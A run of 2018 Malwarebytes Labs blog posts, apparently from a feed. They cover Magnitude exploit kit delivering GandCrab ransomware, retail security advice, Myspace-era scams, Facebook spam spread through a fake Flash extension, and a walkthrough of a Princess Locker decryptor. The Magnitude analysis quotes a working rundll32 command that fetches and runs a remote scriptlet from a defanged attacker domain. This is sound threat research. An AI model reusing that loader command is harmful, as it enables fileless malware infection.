Techie Feeds

Magnitude exploit kit switches to GandCrab ransomware

Malwarebytes - Tue, 04/17/2018 - 16:58

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. Variations of this technique have been known for several years and used by other families such as Poweliks, but it is a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding or, more recently, via another technique, but it still exposed the payload in the clear in traffic or network packet captures.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication "; document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or the Flash Player (CVE-2018-4878) exploit is fired.

Time will tell if Magnitude sticks with GandCrab, but this is a noteworthy change for an exploit kit that used its own Magniber ransomware exclusively for about seven months after replacing the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

5 cybersecurity questions retailers must ask to protect their businesses

Malwarebytes - Tue, 04/17/2018 - 15:00

The Target breach in 2013 may not be the biggest retail breach in history, but for many retailers, it was their watershed moment.

Point-of-sale (PoS) terminals were compromised for more than two weeks, and 40 million card details and 70 million records of personal information were swiped, part of which was "backlist" historical transaction information dating back roughly a decade. Credit unions paid over $200 million in costs for card reissues, then filed a class-action lawsuit against Target to recoup that cost.

And the most mind-blowing fact of all? Target actually had (and still does have) cybersecurity measures in place and a security policy for employees to follow. How and why the breach even happened the way it happened remained the subject of discussion for a long time, and hard lessons were learned.

The good news for retailers is that it doesn’t (always) have to be this way.

Pose the right questions

Retailers of all shapes and sizes care about their businesses and clients. No merchant would want to be in the shoes of Target or TJX for a minute post-breach. In fact, they would do almost anything to keep something that big, messy, and costly from happening to them.

It’s understandably challenging to add more to an already tall order of “things to do” in the retail industry; however, cybersecurity should no longer be seen as an afterthought, nor should it be treated like an option that one can get hyped up about today and then forget tomorrow. It has quickly become an integral part of any organization for the sake of business continuity, client retention, and brand integrity.

If you remain unconvinced whether you really need to incorporate cybersecurity in your business, perhaps this is a thought you can consider: If your organization uses any form of technology that connects to a data communication avenue and/or the Internet, chances are you need cybersecurity.

“Where do I start?” is probably not the right question to ask once you decide to kick off this journey, for you’ll most certainly receive an “I don’t know” or “I have no idea” just as instantly. Instead, be specific and practical. Come up with questions that you think you can answer. We have listed some below that you can use to guide you on your way.

What am I using in business that needs protecting?

Here, you can list your valuable assets, beginning with the tangible (the retail store, CCTV cameras, mobile phones, point-of-sale machines, etc.) and then the intangible (your website, customer data, intellectual property, etc.). Once done, you can find ways to secure them individually according to your business’s needs. Most of the time, all you need to do is configure your devices and peripherals to make the most of their security-related settings.

For example, installing smart CCTV cameras on premises can both lessen the risk of physical theft and aid law enforcement in capturing criminals should something terrible happen in the shop. But who is watching your watcher? Better yet: Who else could be watching through your watcher? Many CCTV cameras can be accessed publicly via the Internet. You can secure these cameras, and ensure that you and your staff are the only ones who can use them, by setting them to local-only mode and changing their admin names and passwords.

You may also decide to seek help from your service provider with more complicated devices and systems.

Read: Why you don’t need 27 different passwords

Should you wish to invest in software or tools, pick those that protect as many of your assets as possible. For example, many endpoint security solutions allow users to install them on multiple Windows devices.

What are the threats that can potentially affect my business?

Cybersecurity threats to retail businesses can come in the form of people or technology. We’re quite familiar with the former: from the petty thief to an organized crime group. There are also malicious insiders and basically anyone meaning to make money out of your business.

On the other hand, one thing merchants often miss when identifying potential sources of threats is the very technology (apps, modern payment systems, and others) they use or invest in to remain competitive. The dangers or risks these introduce are usually accidental, and they can be avoided entirely.

Customer data remains the primary target of fraud in the retail industry. For those not in the know, a single customer record may contain credit or debit card details, spending patterns or habits, and loyalty behaviors, all of which can be gathered from online shopping, digital marketing, and the loyalty schemes the customer is enrolled in.

Retailers must also keep in mind that they must defend themselves against malicious insiders, spear phishing, DDoS attacks, brute force attacks, reconnaissance and other suspicious activity, supply chain attacks, and more. If you’re a merchant using the omni-channel approach, be aware that a new type of fraud has emerged in this environment. We’ll tackle it in depth in a future post.

How can I keep cybersecurity threats away from my business?

Merchants have gotten really good at handling traditional risks and threats to their businesses. But managing potential physical risks, fantastic as that is, is one thing; managing digital risks is another. Thankfully, new and old merchants alike don’t have to start from scratch. There are already industry standards in place, such as the PCI Security Standards Council’s Data Security Standard (PCI DSS), that they can readily learn from. The Object Management Group (OMG), an international technology standards consortium, also has a cybersecurity standard that merchants may want to look into. And if you have clients in the UK and EU countries, let’s not forget the GDPR.

As for other cybersecurity threats that need addressing, such as those that affect a merchant’s website, our Labs blog has a lot of great resources.

The National Federation of Retail Newsagents (NFRN), an organization composed of thousands of independent retailers in the UK and Northern Ireland, published a booklet that also serves as a checklist for merchants regarding assessing retail crime risk. This list includes physical security and cybersecurity.

Lastly, merchants must decide on a regular time to conduct a risk assessment—monthly, quarterly, biannually, or annually.

Should my employees get involved in mitigating cybersecurity risks?

Absolutely. When it comes to implementing good security practices in a retail business, merchants cannot do it alone. One way to start is by creating a culture of cybersecurity from the very beginning. Merchants can even incorporate awareness and basic cybersecurity concepts into their training process for new hires. Get them up to speed on the kinds of digital threats the business may face at some point, and give them steps for responding efficiently to red-alert cases.

Read: How to create an intentional culture of cybersecurity

Note that training must be done on a regular basis and not just a one-off occurrence. It must also be relevant, practical, and engaging to employees. Use familiar case studies like the Target breach, or if your organization has experienced a form of cyberattack in the past, use that as a teaching moment, too.

What else can I do once I’ve secured the business’s assets?

Once you’ve done a great deal of securing, realize that the job doesn’t end there. There are still some things that need to be done:

  • Monitor your PCI environment on a regular basis. Doing so will notify you in real time of potential intrusions in your payment system so you can nip the threat in the bud before circumstances escalate.
  • Schedule a regular audit of security and compliance. This will ensure that your retail business remains in compliance with security and industry standards.
  • Join a community. Information sharing among fellow merchants is becoming a trend when it comes to cybersecurity. Firms learn from each other’s victories and mistakes. After all, cybercrime is not just a problem of one but of every organization in the industry. Cybersecurity, in this regard, is now a community effort.
  • Keep learning. Staying on top of the latest security news and industry challenges can help merchants familiarize themselves with tactics threat actors are using against retailers, assess their current situation, and make adjustments to their defenses and protocols accordingly.
  • Prioritize security and privacy when creating apps. Should you choose to develop software, such as apps that you encourage your clients to install, make sure you build them with security in mind.
  • Create a security policy. This makes good computing practices feel not just like guidelines but like actual procedures employees need to adhere to. Here are sample templates merchants can use and tweak to their preference.

Stop chasing the wrong answers

Breaches are inevitable. This is a known fact and an often-repeated line by people in the cybersecurity industry. Companies have been advised to prepare.

That said, perhaps a merchant’s next and final question would be this: If a breach is inevitable, then what’s the point of doing all this?

It’s true that no one wants to invest a lot of time and money in security tools, services, and people to fight off breaches only to be told prevention isn’t possible. The message they’re hearing is “the bad guys always win, and there’s nothing you can do about it.” However, this isn’t in line with reality at all.

While there’s no such thing as perfect security, the protocols a multitude of companies have in place have already helped them stop many breach attempts.

Unfortunately, threat actors do sometimes succeed in infiltrating a retailer’s network. In that case, the logical action is to contain the intrusion to prevent it from escalating and causing more damage. But containment and preventative steps cannot be taken if proper security measures, guidelines, and a good security architecture aren’t in place to begin with. Identifying what made the attack successful, so the organization can make changes, is also part of the overall cybersecurity strategy. So putting those measures in place isn’t for naught.

The post 5 cybersecurity questions retailers must ask to protect their businesses appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Myspace vs. Facebook: the good old days?

Malwarebytes - Mon, 04/16/2018 - 16:13

Many people have fond memories of ye olde Myspace dotte comme, and those rose-splashed spectacles seem to have grown ever larger in light of the recent Facebook happenings.

In recent days, I’ve seen many declaring their love for all things Tom, and how everything was just one huge barrel of laughs and good times on the fledgling social network. In the showdown of Myspace vs. Facebook, articles are appearing that explain how Tom “beat” Zuckerberg in the long run.

However, a variety of popular memes and more general good vibes based on this sentiment clash with a somewhat more complicated picture of events.

Here’s the thing: I was around at that time, neck deep in social network research from about 2006 to 2010, and one of my main stomping grounds was indeed Myspace. During that time, I wrote about an astonishing number of problems on the platform. I was responsible for getting a few of them fixed, having a number of bad actors thrown off, and causing lots of problems for adware vendors using so-called Web 2.0 as a testing ground for bogus installs, as well as creating similar headaches for malware authors pushing everything from drive-by attacks to worms.

If you missed all of that action, or you simply weren’t around at the time, you might think the current social network bonfire we have on our hands is an entirely new phenomenon. I felt it was worth revisiting the land that time forgot (uh, a decade ago) and seeing what, exactly, was going on.

Way back when

Social network scams are now pretty samey, and new-fangled original attacks are fairly rare. Back in the early days of Myspace, everything was new and exciting, and even the most basic of survey scams or spam comments on someone’s profile page could potentially elicit a gasp or three. In 2006/7, the only people really attempting to harness the huge numbers of social media users were adware vendors and the odd malware author.

Over time, that would shift away from adware to hacks, trolls, and social engineering, leaving everything looking a bit scorched earth…not just on Myspace, but gradually across many other major social network platforms, too.

We begin our exploration of a complicated picture of events with a jaunt back to 2006.

2006: worms, adware, and get rich quick schemes

Looks like our DeLorean has indeed arrived in 2006, because Justin Timberlake is on the radio bringing Sexyback, Superman Returns to cinemas (when he probably shouldn’t have), and Twilight is going wild on bookshelves. Meanwhile our 3-year-old, 2.0 hangout space is starting to run into increasingly frequent trouble.

One of the first major social network worms ripped through Myspace, hidden inside a QuickTime file. Alterations were made to infected profiles, utterly confusing their owners, and it seemed to spread in a manner similar to the first Orkut worm, even coming back to life after a profile clean-out. The financial gain here came, in part, from Zango adware being bundled with the infection file by the worm-creating affiliate who put the whole thing together.

In fact, Zango were caught up in another Myspace fiasco when they claimed they weren’t specifically targeting the platform for installs, despite the uncovering of an affiliate email suggesting just that. Here’s an extract, and the focus on animated gifs and cheery distractions is wonderfully quaint:

“MOVING GIFS. This really gets people’s attention and vistors [sic] love this sh**,” one tip reads. Another: “Highlight the html code and embed one of the videos. This will make it automatically pop when the visitor reaches that page. This will lead to a lot more thinking to themselves: ‘hmm, this looks like a cool video. I’ll watch this. CLICK.'” “More profitably, go to a bunch of your friends who have popular profiles and pay them (it’s up to you so much. One of my partners said 5$…maybe offer to split the money with them?) to put a zango video into their profile through your site. This will give you hundreds of extra installs a day,” the e-mail reads. “This probably works even better than having them on your actual site.”

Moving away from adware vendors: In 2018, malvertising is a big deal, but it’s also a rather old one. We can go back to 2006 and see the infamous WMF exploit being used to install malicious files via banner ads on Myspace, with up to “one million” installs across the thousand or so sites the ads were loading on. After a couple of years of a fresh new approach to interacting online, people with a taste for cash have moved into town, and they have other ideas. Things will straighten themselves out next year, right?

2007: Battle of the bands and glory hunters

One of the wheels has fallen off the DeLorean, but we’re still hitting 88MPH, which is just as well because Shrek 3 and Spider-Man 3 are going off the rails in the cinema, and Rihanna has lost her umbrella. While we’re talking about music…

Most social networks have learned to keep profile page edit functionality to a minimum, or use templates, but Myspace was pretty much the king of “do what you want.” It’s hard to think of another social network that had so eminently editable a profile page. You could do all sorts of custom HTML tricks, hide elements, include new ones, overlay everything with huge sparkly gifs and half a dozen MIDI files—it was great (relatively speaking).

The flip side of this is that bad people could do the same thing.

In 2007, a large number of big name musicians with huge followings, and many smaller bands too, had their Myspace pages compromised. A quick splash of custom HTML later, and clicking anywhere on the page would redirect to rogue sites hosted in China offering up a variety of malicious installs. It was never established what, exactly, was the point of entry for the scammers but if it was a phishing campaign then it was sustained, targeted, and made life very difficult for musicians plying their trade.

Meanwhile, it would have been very handy if Justin Timberlake had brought Sexyback in 2007 instead, because I could have used it to work in a reference to another spate of high-profile compromises. The N*Sync golden boy fell victim to defacements, alongside Hilary Duff and Tila Tequila (if you weren’t nostalgically flopping around in 2007, you definitely are now). These attacks were much more about a sense of “look what we can do,” as opposed to any financial gain, and that trend began a steady climb upwards as we limp into 2008.

2008: Trolling, tracking, and hacks

Okay, the DeLorean is somewhat ablaze, and I’ve lost my novelty Tom bobblehead down the back of the seat, but we’re still mostly in one piece. Hunger Games is all the rage in bookstores, Katy Perry is all over the charts, and The Dark Knight is the best chaos-laden Batman movie you’ll ever see (no really, it is). Speaking of chaos…

Myspace had a big problem with troll groups, some of whom I covered in an IRISSCON talk last year. Back then, there weren’t many online sources of help for things like suicide prevention, drug addiction, or other forms of abuse. Myspace groups were, for many, the go-to place for help and advice. Trolls would show up and bomb the boards with gore pictures and worse, and many of the support groups set their boards to private, making them harder to find.

You know what’s bad? Support groups that are hard to find.

After the boards went into lockdown, someone coded up something called the Lottery Browser, which allowed you to click a button and be dumped into a private group at random. Things became problematic quite quickly after that. Harassment campaigns, targeted attacks, even some individuals who kept a sort of “suicide scoreboard,” claiming they were trying to encourage people to kill themselves for Internet kudos points. Myspace eventually fixed this one, too.

An offshoot from the same group created a few lines of code allowing someone visiting your Myspace profile to be auto-subscribed to your video channel. In practice, this meant that you could see, at a glance, if security researchers or law enforcement were checking you out. This was very common on Myspace, and many local law enforcement officers would create profiles and friend people in their area. Nothing says “burn your hard drives” like Officer Jones showing up on your follow list if you’re up to no good.

Myspace had actually blocked most, if not all, IP trackers on profiles, meaning someone couldn’t send you a bogus link and grab an IP. However, it’s arguably more useful to know specifically who is being subscribed to your video list. One of the solutions to this was adding the video portion of the Myspace URL to your hosts file; Myspace eventually fixed this, too, after I brought it to their attention.
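For readers unfamiliar with the hosts-file trick mentioned above, the idea is simply to point the unwanted hostname at your own machine so the subscription request never reaches the real server. The hostname below is purely illustrative, not the actual Myspace video domain:

```
# Illustrative hosts-file entry (the hostname is a placeholder, not the real
# Myspace video domain): resolve the video host to localhost so the
# auto-subscribe request silently fails.   vids.social-network.example
```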

In short, things were a bit of a mess, and while social networks of the time had slowly come to terms with malware attacks and adware vendors, the less visible types of social engineering/trolling were a tough nut to crack.

2009: Goodbye Myspace, Hello Facebook

We’ve done it now. The DeLorean is on fire and the book charts are awash with more Hunger Games and Maze Runners. I refuse to watch Avatar, and Beyonce is all about putting a ring on it. I’m trapped in a land of people slowly losing interest in Myspace, while the “like” counter continues to rise for the somewhat cooler juggernaut that is Facebook.

Look, I am definitely not watching Avatar.

Instead, let me direct you to a diagnosis, because Dr. Boyd detects a terminal lack of Myspace scams in exchange for…Facebook privacy control concerns! Honesty boxes! Phishing! These examples are anecdotal and specific to my own research, but in general 2009 felt like a shift away from the elder network onto a portal increasingly holding all the cards. I’m not sure when I wrote my last batch of “lots of problems on Myspace, and here they are” blog posts, but at this point Facebook and Twitter were the places to be. Sorry, Tom.

No stone left unturned

Actually, we have a dump-truck-sized stack of rocks we haven’t poked yet. I didn’t get a chance to mention 2005’s Samy worm, the nearly half a million “private” photos that appeared in a torrent, the 20-year-long collection of independent privacy assessments, or…well…you get the idea.

I love social networks. I think they’re great, for the most part. But the ones we have now probably have just as many problems as the sites we’ve abandoned. The specifics may differ, but ultimately none of them are perfect, and the notion that everything was ideal back in the day is a potentially dangerous one.

Those who ignore history are doomed to stand around next to a crater-shaped DeLorean complaining about Avatar. Thankfully, the music is great.

The post Myspace vs. Facebook: the good old days? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in security (April 09 – April 15)

Malwarebytes - Mon, 04/16/2018 - 15:05

Last week, we took a look at a malware campaign called FakeUpdates, methods for using secure instant messaging, the inner workings of a decryption tool, and some Facebook spam campaigns.

We also published our first quarterly Malwarebytes Labs CTNT report of 2018.

Other news
  • A security researcher discovered a flaw in the P.F. Chang’s Rewards website. (Source:
  • Security Consultant Xavier Mertens described a suspicious use of certutil.exe. (Source: InfoSec Handlers Diary Blog)
  • A significant number of Cisco devices belonging to organizations in Russia and Iran were hacked by a group calling itself JHT. (Source: The Hacker News)
  • Facebook CEO Mark Zuckerberg spoke at a joint hearing of the US Senate judiciary and commerce committees in Washington, DC. (Source: siliconrepublic)
  • A vulnerability in Microsoft Outlook allowed hackers to steal a user’s Windows password. (Source: ThreatPost)
  • A malware gang is going for identity theft and phony tax refunds by targeting CPAs. (Source: Krebs on Security)
  • Researchers sinkholed the infamous EITest infection chain. (Source: SecurityWeek)
  • A Microsoft network engineer was charged with money laundering linked to Reveton computer ransomware. (Source: SunSentinel)
  • Intel has addressed a vulnerability in the configuration of several CPU series that allows an attacker to alter the behavior of the chip’s SPI flash memory. (Source: Bleeping Computer)
  • An old and flawed JavaScript crypto library could allow Bitcoin theft. (Source: The Register)

Stay safe, everyone!

The post Week in security (April 09 – April 15) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook spammers making things worse

Malwarebytes - Fri, 04/13/2018 - 15:00

Facebook’s having a bad couple of weeks. Between Congressional testimony and new information coming forward about Cambridge Analytica’s use of user data, the tech giant is having problems keeping its users aboard. Unfortunately, misery loves company. We noticed a few Facebook spam campaigns this week that can only make things worse.

Should a browser extension be able to add a Facebook app?

The first of the Facebook spammers was pointed out by one of our forum visitors. While the campaign was aimed at Finnish Facebook users, the origin is probably not Finnish, so this one could be coming to a Facebook timeline near you anytime soon.

The modus operandi was as follows: A website was set up to push a forced Firefox extension, claiming you needed a Flash update.

Translation: your Flash player has expired, and you need to update in order for the website to work properly. Accept/install flash updates and add them into your browser.

Once installed, the extension looked like this:

Looks legit, right?

What has this got to do with Facebook, you ask? Users who installed this extension while logged into Facebook in the same browser got a bonus: a Facebook app, reportedly operating under several different names like HTC Sense, Spotify, and Pandora. This app then spammed the user groups the affected Facebook account belonged to with messages like this:

An English version of this post (courtesy of Facebook) would look like this:

So the threat actors would have you Google a certain key phrase and make sure you ended up at a sponsored result offering high-end phones for unbelievable prices. And you know what they say about things that are too good to be true. The top search result for the keyword now goes to a Facebook page warning about this scam:

So, this about sums up how this intricate scheme worked, but the question that kept nagging at me is: Why can a Firefox extension install a Facebook app? Well, that’s a simple matter of permissions.

If you allow extensions to access your data for all websites (in this case, Facebook), even on other tabs, it can “borrow” your login session and install an app for you. Note that the extension needs you to “auto-login” to Facebook when it opens Facebook in a new tab (or pop-up).
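As a rough illustration of how broad that permission grant is, a WebExtension's manifest.json can request host access to every site plus the tabs API. The extension name and structure here are generic placeholders, not taken from the actual sample:

```json
{
  "name": "fake-flash-update",
  "manifest_version": 2,
  "version": "1.0",
  "permissions": [
    "<all_urls>",
    "tabs"
  ]
}
```

With `<all_urls>` granted, the extension's scripts can read and act on any page the user has open, including an authenticated Facebook session in another tab.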

In the .xpi file that is the de facto Firefox extension, there are two heavily obfuscated JavaScript files called background.js and tokeneo.js. Together, they are able to open a pop-up asking for your permission to install a Facebook app and to confirm that action at the same time. All it needs is for you to be logged in to Facebook in one of the other tabs, and most Facebook users will automatically be logged in as soon as they open the site.

Partially deobfuscated snippet from tokeneo.js

Malwarebytes can remove the extension for you, as pointed out in our removal guide for Flash-paivitys, but you will have to remove the Facebook app manually. Look for the names we mentioned earlier:

  • HTC Sense
  • Spotify
  • Pandora

But keep in mind that they can adapt these easily. Rule of thumb for removing Facebook apps: If you can’t recall why you installed it, it should probably not be allowed to post on your behalf. We have reported the API that was used in the extension to Facebook, and they have taken it into consideration. Hopefully it will be blocked soon.

Oh, but there’s more

The other campaign that is making the rounds spams your Facebook friends by sending a so-called YouTube link via Messenger.

In fact, the link does not take you to YouTube at all, but to:{id number}&name={username}

Which only shows this button:

Clicking that button takes you to http://dosmil.puchamon[.]info/?wkr=manu&id={id number}&name={username}. It looks as if this has been removed by the host, but a look at the archives shows us that it very likely was a page asking for your permission to install yet another Facebook app.

And that app would have just as easily turned you into the next person spreading these Messenger links. This looks a lot like the “Is this you?” Messenger campaign that made the rounds last year. If they really are related, then the main goal is probably ad fraud by clickjacking.

Spam adds to burden

These two new spam campaigns are only adding to Facebook’s burden. While one is aimed at Finnish users (for now) and the other was rather quickly terminated, we expect both to resurface in one form or another.

If Facebook wants to have a close look at the apps that they allow on their platform, they should start by putting a big dent in the number of apps that are spreading malware, or simply clickfraud, and that propagate by spamming user groups, Messenger inboxes, and timelines in general.

Stay safe, everyone!

The post Facebook spammers making things worse appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Encryption 101: decryption tool code walkthrough

Malwarebytes - Thu, 04/12/2018 - 17:34

We have reached the final installment of our Encryption 101 series. In the prior post, we walked through, in detail, the thought process while looking at the Princess Locker ransomware. We talked about the specific ways to narrow down the analysis toward the encryption portions, the weaknesses in this specific encryption scheme, the potential options we might have for decryption, and finally we made a game plan for creating a decryption tool.

To continue from that point, and to close out this series, we will walk through the source code of the Princess Locker decryption tool, which my colleague hasherezade created. After Part 4 of the series, you could most likely have used that information to create your own tool. However, to solidify everything and make sure it all clicks, I will explain the details of this already-functioning tool, as I believe it is much easier to understand something, and to create your own tools in the future, if you first see how a working one is put together.

The process of reverse engineering the encryption code and forward engineering the decryption code essentially covers the same ground from multiple angles.

Code overview

Let’s first walk through all the functions in this program at a high level and do a quick overview of what they are and how they are used together. This will help the specific lines of code within each function make more sense when we are going through in detail.

The full source code of this tool is available here: Princess Locker decryption tool source code. I strongly recommend you follow along with full source code open in another window as you read this article.

Let's start from the top of the main.cpp file.

#define CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

If you remember from when we were analyzing the RNG portion of Princess, the numbers being generated were used as indexes to look up letters in this string. So, if the random number 38 was generated, it would have added the letter “c” to the victim ID string, since “c” sits at index 38 when the string is treated as an array. That is what the CHARSET is here.
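As a rough illustration, here is a minimal Python sketch of that index-lookup scheme. The tool itself is C++; the MSVC-style LCG below is an assumption about which CRT rand() the ransomware linked against, and the helper names are ours:

```python
CHARSET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

class MsvcRand:
    """LCG matching the MSVC CRT rand() (an assumption about what
    srand()/rand() resolved to in the Princess Locker binary)."""
    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def rand(self):
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF

def make_random_string(seed, length):
    """Build a pseudo-random string by indexing into CHARSET,
    the way the ransomware builds the victim ID and extension."""
    rng = MsvcRand(seed)
    return "".join(CHARSET[rng.rand() % len(CHARSET)] for _ in range(length))
```

Because the whole string is a pure function of the seed, anyone who can guess the seed (a timestamp) can regenerate it, which is exactly the weakness the decryptor exploits.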

Below is a list of the major functions that are worth talking about:

  • find_key – incrementally generates a key from a seed value, decrypts a file, and checks it against the original file
  • dump_key – writes the key out to a file
  • check_key – uses a potential key to decrypt a file, then checks the result against the original version
  • find_start_seed – wrapper function; calls the others to find the seed value that was used for the UID or extension
  • find_seed – incrementally tests seeds, generating random strings to verify against the UID
  • find_key_seed – NOT USED; wrapper for find_seed with a direction flag
  • find_uid_seed – wrapper for find_seed, setting the isKey parameter to false

I did not mention the other functions here because they are either not directly related to the decryption/key searching, or they are self-explanatory. For instance, read_buffer is exactly what it sounds like: a helper function that reads a buffer in from a file. It is used within some of the functions above, but it is not worth covering in detail.

Of all of these, the find_seed and find_key are the two functions that are doing the major portion of the work.

Main function

Now let’s start from the wmain() function and walk through all the logic in detail.

We will skip ahead to line 314: printf(“Searching the key…“);

Everything pictured above is just input checking to make sure everything that is needed was provided properly.

The rest of the main is below:

The next line is DWORD init_seed = time(NULL); This just gets the current time, which will be the first seed we test against. We know from Part 4 that the current time was the only input used to seed the random number generator. So, we will start from the current time and decrement it as we run our test key generation.

do {
    DWORD uid_seed = find_start_seed(unique_id, extension, init_seed);
    key = find_key(filename1, filename2, check_size, uid_seed, limit);
    init_seed = uid_seed - 1;
} while (!key);

We see the find_start_seed function being called. Its parameters unique_id, extension, init_seed are, in order: the ransom note ID (or NULL if none was provided), the random file extension that Princess added on, and the current time. As the loop progresses, init_seed is decremented, because we are essentially trying to find the exact second when the Princess infection occurred on these files.

Three different second values were used for seeding the three uses of the RNG. As I mentioned in the previous post, they are the extension, the UID, and the AES key password. Once we find one of them, the others are very close by in time, so we can easily find the rest.

Let’s look at the details of find_start_seed before continuing on. Let’s assume we are passing in a UID we got from the ransom note.

The first call you see inside of here is the find_uid_seed(). This is a wrapper function to find_seed(), which is the main workhorse. The false boolean variable passed in is telling it to decrement when searching for the UID value. This makes sense because the seed we start with here is the current time, so obviously the infection has occurred in the past.

Before going into the details of the find_seed function, I'll go over at a high level what's happening in the rest of this function. The result of the find_uid_seed call will be the seed value, i.e., the exact second at which the RNG was seeded to generate the ransom note ID during the infection.

You'll notice the “if” around the UID variable. It is there because the ransom ID is not a requirement; it only makes the result more certain. If someone does not have their ransom ID (referred to as the UID), they can still try to decrypt with just their file extension.

The reason this works is that the UID was one RNG seeding during infection, the random file extension was another, and the actual AES password was the third. So having either the extension or the UID should be enough to find the AES password seed. If you do have both, however, the result is that much more certain, like a double verification.

Next we have the extension part:

if (uid) {
    ext_seed = find_uid_seed(ext, uid_seed, true);
} else {
    ext_seed = find_uid_seed(ext, seed, false);
}

What’s going on here is if UID was passed in, that means that we have found the seed value for UID. If that is the case, we can use that seed value (the time which the UID RNG was seeded) as the starting point for looking for the extension seed. In the analysis of Princess Locker from Part 4, we saw that the UID was seeded first and then very soon after the extension RNG was seeded. So we can expect that the two seeds will be close in value.

This is why the true variable is passed in here. We are starting from the UID seed time and now counting forward to find the extension seed time. Now, if the UID was not provided by the user here, you see the same call is made with the false variable passed in. The seed is now the current time seed, which means we are just counting back from now until we find a seed match for the extension. 

if (uid && ext_seed - uid_seed > 100) {
    printf("[WARNING] Inconsistency detected!\n");
}

After it has found both the UID seed time and the ext seed, it then does this final check and makes sure that the difference is less than 100. The reason for this is again that during the Princess Locker execution, the UID seed is generated, and then very shortly after in code flow, the ext seed is generated. If these two times are more than 100 seconds apart, something strange is occurring.

DWORD find_uid_seed(wchar_t* uid, DWORD start_seed, bool increment = true)
{
    return find_seed(uid, start_seed, increment, false);
}

As I said before, find_uid_seed is just a wrapper for find_seed, which is the main code that does the seed searching. So let's go into that now.

After some variable initialization, we have the main loop of the function:

while (true) {
    srand(seed);

What’s going on in this loop in general is a recreation of the random number generation portion of the ransomware itself. This is why it starts with srand(seed). The seed is the time passed in. This will determine the sequence of numbers that comes after by using the rand call.

So, in the loop, we build the string by taking each random number as an index into the charset. If the string being generated does not match the UID provided by the user, the seed is not correct, so the function decrements the time and tries again.

If this function was being called to find the ext after it already found the UID in a previous call, the seed time would be incremented. Here is a picture of the timeline so you can understand when and why we increment vs. decrement in various stages.

So, the stage that you are starting from will determine if you pass true or false into this find_seed function to make it decrement time or increment time.
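As a rough illustration of this search, here is a minimal Python sketch of the brute-force idea. The function and the toy generator below are illustrative stand-ins, not the tool's actual C++ code:

```python
import random

def find_seed(target, start_seed, make_string, increment=False, limit=1_000_000):
    # Walk the candidate seed one second at a time, regenerate the
    # pseudo-random string, and compare it against the value recovered
    # from the victim (the UID or the extension). A cheap string
    # comparison is all that is needed per candidate seed.
    seed = start_seed
    for _ in range(limit):
        if make_string(seed, len(target)) == target:
            return seed
        seed = seed + 1 if increment else seed - 1
    return None

# Illustrative stand-in for the seeded generator (NOT the MSVC rand()).
def toy_generator(seed, length):
    rng = random.Random(seed)
    return "".join(rng.choice("0123456789abcdef") for _ in range(length))
```

Searching downward from "now" recovers the second of infection; searching upward from an already-recovered earlier seed (such as the UID seed) finds the later ones.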

Back to main function

Now that we have covered the details of the find seed functions, let’s get back to the main function after the find_start_seed where we left off.

The find_start_seed is a series of loops in itself. So after this call, most likely, it will have found a working seed value. If both the ransom ID and ext were provided, it will return the UID seed, as it is closer in the timeline to the AES password seed.

Otherwise, if the UID was not provided, it will return the seed it found for the extension. If we look at the timeline, we see that the UID seed time occurred after the AES seed time. This means that we will need to do a couple of things in a loop:

  • decrement the seed one by one
  • attempt to generate an AES password using the current seed
  • decrypt the encrypted test file
  • check it against a known clean version

So let’s now take a look at the find_key function and talk about the mentioned steps here in detail.

wchar_t* find_key(IN wchar_t *filename1, IN wchar_t *filename2, size_t check_size, DWORD uid_seed, DWORD limit=100)

Again, I’ll skip past the initial parts of the code that are just doing some reading and error checking. We get to the interesting parts at line 234.

The key_seed variable is set to the moment in time at which the ransom note ID was generated; we found this value with find_start_seed and passed it into the find_key function.

do {
    key = make_key(MAX_KEY, key_seed, true);

The first line in the loop for finding the keys here is the make_key call. I will not go into much detail here because it is not too different from how we generated UID or ext. It is just taking a seed and creating a random string the size of the ransom note ID using indexes to the charset string.

Next is a small loop for actually creating the AES key password and hashing it, mirroring what Princess Locker does. The ransomware does not use the randomly-generated password on its own: it creates a random string, hashes it using SHA-256, and then uses that hash as the key. Finally, the tool checks each candidate key by decrypting.

for (key_len = MIN_KEY; key_len <= MAX_KEY; key_len++) {
    if (check_key(in_buf, expected_buf, check_size, key, key_len)) {
        printf("\nMatch found, accuracy %d/%d\n", check_size, BLOCK_LEN);
        key[key_len] = 0;
        found = true;
        break;
    }
}

The check_key function performs the following:

aes_decrypt(inbuf, outbuf, BLOCK_LEN, key_str, key_len)

It performs an AES decryption using the test randomly-generated password and checks whether the output matches the clean file.
